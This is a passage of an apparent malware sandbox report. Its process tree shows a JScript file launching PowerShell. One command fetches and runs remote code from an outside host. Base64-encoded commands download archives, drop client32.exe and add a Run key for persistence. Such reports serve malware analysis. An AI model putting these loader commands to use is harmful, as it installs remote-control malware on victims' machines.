QBYAEUAIAAvAFQAcgBBAG4AcwBmAGUAUgAgAGQAZABkAHYAUwAwAFYAagAgAC8AZABvAFcAbgBsAG8AYQBEACAALwBQAHIAaQBPAHIAaQB0AHkAIABuAG8AUgBtAEEATAAnACwAIAAkAEgAbgBnAGYARAAsACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAJAA1AFUARgB6AEkAPQAiAGIAaQBUAFMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAcgBhAE4AUwBmAGUAUgAgAHIANAAyAGkAagBKACAALwBEAG8AVwBuAEwAbwBBAEQAIAAvAHAAcgBpAE8AcgBJAFQAWQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJAB5ADEAbABJADcAUABpAE4ALAAgACQAcgA4AGsAegBRADMAZQBqADsAIAAkAE0AeABjAEQAMgBiAFYAPQAiAEIAaQB0AHMAYQBkAE0ASQBuAC4AZQB4AGUAIAAvAFQAcgBBAG4AUwBGAEUAcgAgAFEAWABIAE0ATwBUACAALwBEAE8AVwBOAEwATwBBAGQAIAAvAFAAcgBJAE8AUgBpAHQAeQAgAG4AbwBSAE0AYQBMACAAJABRAGQASQA0AHAAQQA4AFkAIAAkAEcAUQBVAFMANABEAGgAcQAiADsAIAAkAFcAbQBUAE0ARgBDAHAAVwA9AEoATwBJAG4ALQBQAEEAdABoACAALQBwAEEAdABoACAAJABFAE4AdgA6AEEAcABQAEQAQQBUAEEAIAAtAEMAaABJAGwAZABwAGEAVABIACAAJABIAHAAbwB5AE0AOwAgAGkARgAgACgAJABxAGcASgBIADcAKQAgAHsAIABpAEYAIAAoACQASgBDADUAUgB6ADUATgBTACkAIAB7ACAAcwB0AGEAUgBUAC0AYgBpAFQAUwB0AFIAYQBOAFMAZgBlAHIAIAAtAFMATwB1AHIAYwBFACAAJABRAGQASQA0AHAAQQA4AFkAIAAtAGQARQBTAFQASQBuAEEAdABpAE8AbgAgACQARwBRAFUAUwA0AEQAaABxADsAIABzAHQAQQByAHQALQBCAEkAdABTAFQAUgBBAG4AcwBGAEUAcgAgAC0AcwBvAFUAUgBjAGUAIAAkAEgAbgBnAGYARAAgAC0ARABlAHMAVABpAG4AYQB0AEkATwBOACAAJABmAEoAQQBSAGgAVABmAFYAOwAgAHMAdABBAFIAVAAtAEIASQB0AFMAVABSAEEAbgBTAEYAZQBSACAALQBzAE8AVQBSAGMARQAgACQAeQAxAGwASQA3AFAAaQBOACAALQBEAGUAUwB0AEkATgBBAHQASQBPAG4AIAAkAHIAOABrAHoAUQAzAGUAagA7ACAAfQAgAGUAbABTAGUAIAB7AEkAbgBWAE8ASwBFAC0ARQB4AFAAcgBFAHMAcwBJAG8ATgAgAC0AQwBvAE0ATQBBAG4ARAAgACQAdQBzAHMASABXAHIAOwAgAGkATgB2AG8ASwBFAC0AZQBYAHAAUgBFAHMAUwBJAG8AbgAgAC0AYwBPAG0AbQBhAG4ARAAgACQATQB4AGMARAAyAGIAVgA7ACAAJgAgACQANQBVAEYAegBJADsAIAB9ACAAZQBYAFAAYQBOAEQALQBBAHIAYwBoAEkAdgBFACAALQBQAEEAdABIACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAGQAZQBzAHQASQBOAEEAVABpAG8ATgBwAGEAVABoACAAJABXAG0AVABNAEYAQwBwAFcAOwAgAEUAeABwAEEATgBkAC0AYQByAEMAaABpAHYARQAgAC0AcABhAFQAaAAgACQAcgA4AGsAegBRADMAZQBqACAALQBkAGUAUwB0AGkAbgBhAHQAaQBPAE4AUABBAHQASAAgACQAVwBtAFQATQBGAEMAcABXADsAIABFAHgAcABBAG4AZAAtAGEAUgBjAEgAaQBWAEUAIAAtAHAAYQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQAgAC0AZABFAFMAVABJAE4AYQB0AGkAbwBuAHAAYQBUAGgAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcgBEACAALQBQAGEAdABoACAAJAByADgAawB6AFEAMwBlAGoAOwAgAEUAcgBBAHMAZQAgAC0AcABBAHQAaAAgACQAZgBKAEEAUgBoAFQAZgBWADsAIAByAE0AIAAtAHAAQQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQA7ACAAfQAgAGUAbABTAGUAIAB7ACAAJABEAGYAYwBWAHUAZQA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBtAG8AYwBrAC8AJwA7ACAAJABvAFcAQwB5AG8APQBAACgAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAbQBfAHYAcAByAG8ALgBpAG4AaQAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAE4AUwBNAC4ATABJAEMAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEgARQBLAC4ARABMAEwAJwApADsAIABuAEkAIAAtAFAAQQB0AEgAIAAkAEUAbgBWADoAYQBQAFAAZABhAHQAQQAgAC0ATgBhAE0ARQAgACQASABwAG8AeQBNACAALQBJAFQARQBNAHQAWQBwAGUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgAGkARgAgACgAJABKAEMANQBSAHoANQBOAFMAKQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABmAG8AcgBlAGEAYwBoAC0ATwBiAEoARQBDAHQAIAB7ACAAJAB5AEkARQBsAEgASABOAD0AJABEAGYAYwBWAHUAZQArACQAXwA7ACAAJAA2AEUAeABlAFkAcgBwAD0AJABXAG0AVABNAEYAQwBwAFcAKwAnAFwAJwArACQAXwA7ACAAUwBUAEEAUgB0AC0AYgBpAHQAcwB0AFIAYQBuAFMARgBFAHIAIAAtAHMAbwBVAHIAYwBFACAAJAB5AEkARQBsAEgASABOACAALQBEAGUAcwB0AGkATgBBAFQASQBvAE4AIAAkADYARQB4AGUAWQByAHAAOwAgAH0AOwB9ACAAZQBMAHMARQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABGAE8AUgBlAEEAYwBoACAAewAgACQAeQBJAEUAbABIAEgATgA9ACQARABmAGMAVgB1AGUAKwAkAF8AOwAgACQANgBFAHgAZQBZAHIAcAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABXAG0AVABNAEYAQwBwAFcALAAgACQAXwA7ACAAJABBAFcAagB5AEgAZwA9ACIAYgBJAHQAcwBBAGQATQBpAE4ALgBFAHgARQAgAC8AdAByAEEAbgBTAEYARQBSACAAbAB5AHEANABYAFkANQBpACAALwBkAG8AVwBuAEwATwBhAEQAIAAvAHAAUgBpAG8AcgBpAHQAWQAgAE4AbwBSAG0AQQBsACAAJAB5AEkARQBsAEgASABOACAAJAA2AEUAeABlAFkAcgBwACIAOwAgAEkATgBWAE8AawBlAC0AZQBYAHAAUgBlAHMAcwBpAG8ATgAgAC0AQwBPAG0ATQBBAE4AZAAgACQAQQBXAGoAeQBIAGcAOwB9ADsAIAB9ADsAIAB9ADsAIAAkAHYAUQByAHMAUAA9AEcAZQBUAC0ASQB0AEUATQAgACQAVwBtAFQATQBGAEMAcABXACAALQBGAE8AcgBjAGUAOwAgACQAdgBRAHIAcwBQAC4ATgBhAE0ARQA9ACcASABpAGQAZABlAG4AJwA7ACAAYwBEACAAJABXAG0AVABNAEYAQwBwAFcAOwAgACQATAB1AEsAbQAwAEcAagBHAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcwB0AGEAUgBUAC0AUABSAG8AYwBlAHMAcwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIABuAEUAdwAtAGkAVABFAG0AcAByAG8AcABlAFIAdAB5ACAALQBQAEEAdABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAGEATQBFACAAJABIAHAAbwB5AE0AIAAtAFYAYQBsAFUARQAgACQATAB1AEsAbQAwAEcAagBHACAALQBwAFIATwBwAGUAcgB0AFkAdAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7AA==
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:960
  - - C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe
      "C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1768

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:664

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\EU6696.js
1⤵
- Opens file in notepad (likely ransom note)
PID:4932

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\AppData\Local\Temp\EU6696.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://hsdiagnostico.com/readme.php')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noPROFi -ExECutionpoL ByPass -w hidd -E JAA5AE4AUQB4AFQAPQAnAEgASQBaAEwATQBJAC4AegBpAHAAJwA7ACAAYwBoAEQASQByACAAJABlAE4AVgA6AGEAcABwAEQAYQB0AEEAOwAgACQAcQBnAEoASAA3AD0AZwBFAFQALQBjAG8AbQBNAEEATgBEACAARQBYAHAAYQBOAGQALQBhAFIAYwBIAEkAdgBFACAALQBlAFIAUgBPAFIAYQBjAFQAaQBPAG4AIABzAGkATABFAE4AVABMAHkAYwBvAG4AdABJAE4AVQBFADsAIAAkAEsANAB1AEEATQA9ACcAWABpADgANQAxADcAOQAuAHoAaQBwACcAOwAgAFsAbgBFAHQALgBzAGUAUgB2AEkAQwBlAHAATwBJAE4AdABtAEEAbgBhAEcARQBSAF0AOgA6AHMARQBDAFUAUgBJAFQAeQBQAFIAbwBUAE8AYwBvAGwAIAA9ACAAWwBuAEUAdAAuAHMARQBjAFUAcgBpAFQAeQBQAHIAbwBUAE8AYwBPAGwAdABZAHAARQBdADoAOgB0AEwAUwAxADIAOwAgACQASABuAGcAZgBEAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAE4AUwBNAC4AegBpAHAAJwA7ACAAJABKAEMANQBSAHoANQBOAFMAPQBnAEMATQAgAFMAVABBAFIAdAAtAGIASQBUAFMAdABSAGEAbgBTAGYARQByACAALQBFAHIAcgBvAFIAQQBDAFQASQBPAG4AIABzAGkATABlAE4AdABMAHkAQwBvAG4AdABJAE4AVQBFADsAIAAkAEgAcABvAHkATQA9ACcAYQByAGEAZwBkAHIAdABzACcAOwAgACQAUQBkAEkANABwAEEAOABZAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAHIAZQBtAGMAbQBkAHMAdAB1AGIALgB6AGkAcAAnADsAIAAkAHkAMQBsAEkANwBQAGkATgA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBEAEwAQQBBADEAdgBpAGUAdwAuAHoAaQBwACcAOwAgACQASgBhAGcAaABPAD0AJwBiAFQAUwBmAFEAVgBoAC4AegBpAHAAJwA7ACAAJABmAEoAQQBSAGgAVABmAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBhAFAAcABEAGEAdABhACwAIAAkAEsANAB1AEEATQA7ACAAJABHAFEAVQBTADQARABoAHEAPQAkAEUAbgB2ADoAYQBQAHAARABBAHQAQQArACcAXAAnACsAJABKAGEAZwBoAE8AOwAgACQAcgA4AGsAegBRADMAZQBqAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAEUAbgBWADoAQQBwAHAAZABhAFQAYQAsACAAJAA5AE4AUQB4AFQAOwAgACQAdQBzAHMASABXAHIAPQAnAEIASQBUAFMAYQBEAE0ASQBOAC4ARQBYAEUAIAAvAFQAcgBBAG4AcwBmAGUAUgAgAGQAZABkAHYAUwAwAFYAagAgAC8AZABvAFcAbgBsAG8AYQBEACAALwBQAHIAaQBPAHIAaQB0AHkAIABuAG8AUgBtAEEATAAnACwAIAAkAEgAbgBnAGYARAAsACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAJAA1AFUARgB6AEkAPQAiAGIAaQBUAFMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAcgBhAE4AUwBmAGUAUgAgAHIANAAyAGkAagBKACAALwBEAG8AVwBuAEwAbwBBAEQAIAAvAHAAcgBpAE8AcgBJAFQAWQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJAB5ADEAbABJADcAUABpAE4ALAAgACQAcgA4AGsAegBRADMAZQBqADsAIAAkAE0AeABjAEQAMgBiAFYAPQAiAEIAaQB0AHMAYQBkAE0ASQBuAC4AZQB4AGUAIAAvAFQAcgBBAG4AUwBGAEUAcgAgAFEAWABIAE0ATwBUACAALwBEAE8AVwBOAEwATwBBAGQAIAAvAFAAcgBJAE8AUgBpAHQAeQAgAG4AbwBSAE0AYQBMACAAJABRAGQASQA0AHAAQQA4AFkAIAAkAEcAUQBVAFMANABEAGgAcQAiADsAIAAkAFcAbQBUAE0ARgBDAHAAVwA9AEoATwBJAG4ALQBQAEEAdABoACAALQBwAEEAdABoACAAJABFAE4AdgA6AEEAcABQAEQAQQBUAEEAIAAtAEMAaABJAGwAZABwAGEAVABIACAAJABIAHAAbwB5AE0AOwAgAGkARgAgACgAJABxAGcASgBIADcAKQAgAHsAIABpAEYAIAAoACQASgBDADUAUgB6ADUATgBTACkAIAB7ACAAcwB0AGEAUgBUAC0AYgBpAFQAUwB0AFIAYQBOAFMAZgBlAHIAIAAtAFMATwB1AHIAYwBFACAAJABRAGQASQA0AHAAQQA4AFkAIAAtAGQARQBTAFQASQBuAEEAdABpAE8AbgAgACQARwBRAFUAUwA0AEQAaABxADsAIABzAHQAQQByAHQALQBCAEkAdABTAFQAUgBBAG4AcwBGAEUAcgAgAC0AcwBvAFUAUgBjAGUAIAAkAEgAbgBnAGYARAAgAC0ARABlAHMAVABpAG4AYQB0AEkATwBOACAAJABmAEoAQQBSAGgAVABmAFYAOwAgAHMAdABBAFIAVAAtAEIASQB0AFMAVABSAEEAbgBTAEYAZQBSACAALQBzAE8AVQBSAGMARQAgACQAeQAxAGwASQA3AFAAaQBOACAALQBEAGUAUwB0AEkATgBBAHQASQBPAG4AIAAkAHIAOABrAHoAUQAzAGUAagA7ACAAfQAgAGUAbABTAGUAIAB7AEkAbgBWAE8ASwBFAC0ARQB4AFAAcgBFAHMAcwBJAG8ATgAgAC0AQwBvAE0ATQBBAG4ARAAgACQAdQBzAHMASABXAHIAOwAgAGkATgB2AG8ASwBFAC0AZQBYAHAAUgBFAHMAUwBJAG8AbgAgAC0AYwBPAG0AbQBhAG4ARAAgACQATQB4AGMARAAyAGIAVgA7ACAAJgAgACQANQBVAEYAegBJADsAIAB9ACAAZQBYAFAAYQBOAEQALQBBAHIAYwBoAEkAdgBFACAALQBQAEEAdABIACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAGQAZQBzAHQASQBOAEEAVABpAG8ATgBwAGEAVABoACAAJABXAG0AVABNAEYAQwBwAFcAOwAgAEUAeABwAEEATgBkAC0AYQByAEMAaABpAHYARQAgAC0AcABhAFQAaAAgACQAcgA4AGsAegBRADMAZQBqACAALQBkAGUAUwB0AGkAbgBhAHQAaQBPAE4AUABBAHQASAAgACQAVwBtAFQATQBGAEMAcABXADsAIABFAHgAcABBAG4AZAAtAGEAUgBjAEgAaQBWAEUAIAAtAHAAYQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQAgAC0AZABFAFMAVABJAE4AYQB0AGkAbwBuAHAAYQBUAGgAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcgBEACAALQBQAGEAdABoACAAJAByADgAawB6AFEAMwBlAGoAOwAgAEUAcgBBAHMAZQAgAC0AcABBAHQAaAAgACQAZgBKAEEAUgBoAFQAZgBWADsAIAByAE0AIAAtAHAAQQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQA7ACAAfQAgAGUAbABTAGUAIAB7ACAAJABEAGYAYwBWAHUAZQA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBtAG8AYwBrAC8AJwA7ACAAJABvAFcAQwB5AG8APQBAACgAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAbQBfAHYAcAByAG8ALgBpAG4AaQAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAE4AUwBNAC4ATABJAEMAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEgARQBLAC4ARABMAEwAJwApADsAIABuAEkAIAAtAFAAQQB0AEgAIAAkAEUAbgBWADoAYQBQAFAAZABhAHQAQQAgAC0ATgBhAE0ARQAgACQASABwAG8AeQBNACAALQBJAFQARQBNAHQAWQBwAGUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgAGkARgAgACgAJABKAEMANQBSAHoANQBOAFMAKQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABmAG8AcgBlAGEAYwBoAC0ATwBiAEoARQBDAHQAIAB7ACAAJAB5AEkARQBsAEgASABOAD0AJABEAGYAYwBWAHUAZQArACQAXwA7ACAAJAA2AEUAeABlAFkAcgBwAD0AJABXAG0AVABNAEYAQwBwAFcAKwAnAFwAJwArACQAXwA7ACAAUwBUAEEAUgB0AC0AYgBpAHQAcwB0AFIAYQBuAFMARgBFAHIAIAAtAHMAbwBVAHIAYwBFACAAJAB5AEkARQBsAEgASABOACAALQBEAGUAcwB0AGkATgBBAFQASQBvAE4AIAAkADYARQB4AGUAWQByAHAAOwAgAH0AOwB9ACAAZQBMAHMARQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABGAE8AUgBlAEEAYwBoACAAewAgACQAeQBJAEUAbABIAEgATgA9ACQARABmAGMAVgB1AGUAKwAkAF8AOwAgACQANgBFAHgAZQBZAHIAcAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABXAG0AVABNAEYAQwBwAFcALAAgACQAXwA7ACAAJABBAFcAagB5AEgAZwA9ACIAYgBJAHQAcwBBAGQATQBpAE4ALgBFAHgARQAgAC8AdAByAEEAbgBTAEYARQBSACAAbAB5AHEANABYAFkANQBpACAALwBkAG8AVwBuAEwATwBhAEQAIAAvAHAAUgBpAG8AcgBpAHQAWQAgAE4AbwBSAG0AQQBsACAAJAB5AEkARQBsAEgASABOACAAJAA2AEUAeABlAFkAcgBwACIAOwAgAEkATgBWAE8AawBlAC0AZQBYAHAAUgBlAHMAcwBpAG8ATgAgAC0AQwBPAG0ATQBBAE4AZAAgACQAQQBXAGoAeQBIAGcAOwB9ADsAIAB9ADsAIAB9ADsAIAAkAHYAUQByAHMAUAA9AEcAZQBUAC0ASQB0AEUATQAgACQAVwBtAFQATQBGAEMAcABXACAALQBGAE8AcgBjAGUAOwAgACQAdgBRAHIAcwBQAC4ATgBhAE0ARQA9ACcASABpAGQAZABlAG4AJwA7ACAAYwBEACAAJABXAG0AVABNAEYAQwBwAFcAOwAgACQATAB1AEsAbQAwAEcAagBHAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcwB0AGEAUgBUAC0AUABSAG8AYwBlAHMAcwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIABuAEUAdwAtAGkAVABFAG0AcAByAG8AcABlAFIAdAB5ACAALQBQAEEAdABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAGEATQBFACAAJABIAHAAbwB5AE0AIAAtAFYAYQBsAFUARQAgACQATAB1AEsAbQAwAEcAagBHACAALQBwAFIATwBwAGUAcgB0AFkAdAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
  - - C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe
      "C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc7dc79758,0x7ffc7dc79768,0x7ffc7dc79778
  2⤵
  PID:4448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:2
  2⤵
  PID:4576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:8
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2268 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:8
  2⤵
  PID:544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3172 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3152 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4708 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:1
  2⤵
  PID:3728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4836 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:8
  2⤵
  PID:3984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5004 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:8
  2⤵
  PID:4708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4920 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4908 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:8
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5192 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:8
  2⤵
  PID:4564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5024 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 --field-trial-handle=1932,i,6875679126090558390,9837175334150772106,131072 /prefetch:8
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
